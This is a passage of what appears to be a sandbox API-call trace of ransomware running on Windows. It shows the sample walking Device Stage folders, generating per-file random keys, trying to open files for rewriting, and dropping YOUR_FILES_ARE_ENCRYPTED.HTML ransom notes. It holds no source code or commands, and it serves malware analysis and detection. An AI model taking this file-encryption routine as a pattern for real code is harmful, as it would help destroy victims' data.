0xffffffff [0156.731] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8285746, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8285746, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d7dfb3c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x0, dwReserved1=0x60, cFileName="device.png", cAlternateFileName="")) returned 1 [0156.731] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 98 [0156.731] lstrcmpW (lpString1="device.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.731] PathFindExtensionW (pszPath="device.png") returned=".png" [0156.731] lstrlenW (lpString=".png") returned 4 [0156.731] PathFindExtensionW (pszPath="device.png") returned=".png" [0156.731] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.731] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.731] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82ab8a5, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82ab8a5, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, 
nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="overlay.png", cAlternateFileName="")) returned 1 [0156.731] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 99 [0156.731] lstrcmpW (lpString1="overlay.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.731] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0156.731] lstrlenW (lpString=".png") returned 4 [0156.731] PathFindExtensionW (pszPath="overlay.png") returned=".png" [0156.731] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.731] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.732] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82d1a04, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82d1a04, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x60, cFileName="superbar.png", cAlternateFileName="")) returned 1 [0156.732] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png") returned 100 [0156.732] lstrcmpW (lpString1="superbar.png", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.732] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0156.732] lstrlenW (lpString=".png") returned 4 [0156.732] PathFindExtensionW (pszPath="superbar.png") returned=".png" [0156.732] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.732] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa82d1a04, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa82d1a04, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8c437c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x99d3, dwReserved0=0x0, dwReserved1=0x60, cFileName="superbar.png", cAlternateFileName="")) returned 0 [0156.732] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.734] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0156.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.736] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.738] CloseHandle (hObject=0x598) returned 1 [0156.738] GetProcessHeap () returned 0x270000 [0156.739] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.739] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 1 [0156.739] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned 87 [0156.739] GetProcessHeap () returned 0x270000 [0156.739] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.739] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}" [0156.739] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*" [0156.739] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.739] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.739] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a06b8bc, ftCreationTime.dwHighDateTime=0x1c9ea14, ftLastAccessTime.dwLowDateTime=0x2a06b8bc, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x2a06b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x60, cFileName="background.png", cAlternateFileName="")) returned 1 [0156.739] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png") returned 102 [0156.739] lstrcmpW (lpString1="background.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.739] PathFindExtensionW (pszPath="background.png") returned=".png" [0156.739] lstrlenW (lpString=".png") returned 4 [0156.739] PathFindExtensionW (pszPath="background.png") returned=".png" [0156.739] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.739] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.739] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64cf1c24, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64cf1c24, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a06b8bc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x60, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0156.740] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml") returned 100 [0156.740] lstrcmpW (lpString1="behavior.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.740] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0156.740] lstrlenW (lpString=".xml") returned 4 [0156.740] PathFindExtensionW (pszPath="behavior.xml") returned=".xml" [0156.740] 
SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.740] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.740] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d3dee4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64d3dee4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a2ccebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0156.740] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png") returned 101 [0156.740] lstrcmpW (lpString1="watermark.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.740] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0156.740] lstrlenW (lpString=".png") returned 4 [0156.740] PathFindExtensionW (pszPath="watermark.png") returned=".png" [0156.740] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0156.740] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\watermark.png"), 
dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0156.740] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d3dee4, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64d3dee4, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x2a2ccebc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x60, cFileName="watermark.png", cAlternateFileName="")) returned 0 [0156.740] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0156.740] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0156.740] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0156.743] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0156.745] CloseHandle (hObject=0x598) returned 1 [0156.745] GetProcessHeap () returned 0x270000 [0156.746] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0156.746] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9e978d9, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9e978d9, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{8702d817-5aad-4674-9ef3-4d3decd87120}", cAlternateFileName="{8702D~1")) returned 0 [0156.747] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0156.747] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0156.747] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Device\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0156.750] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0156.752] CloseHandle (hObject=0x58c) returned 1 [0156.752] GetProcessHeap () returned 0x270000 [0156.753] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0156.753] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9ebda38, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9ebda38, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="Task", cAlternateFileName="")) returned 1 [0156.753] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned 46 [0156.753] GetProcessHeap () returned 0x270000 [0156.753] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0156.753] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task" [0156.753] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*" [0156.753] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9ebda38, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9ebda38, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0156.753] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xf9ebda38, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xf9ebda38, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.753] FindNextFileW 
(in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1 [0156.753] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned 85 [0156.754] GetProcessHeap () returned 0x270000 [0156.754] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0156.754] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" [0156.754] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*" [0156.754] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, 
ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0156.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9e978d9, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0156.756] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x95b71b60, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0156.756] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 91 [0156.756] GetProcessHeap () returned 0x270000 [0156.756] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0156.757] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device 
Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0156.757] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*" [0156.757] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x95b71b60, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, 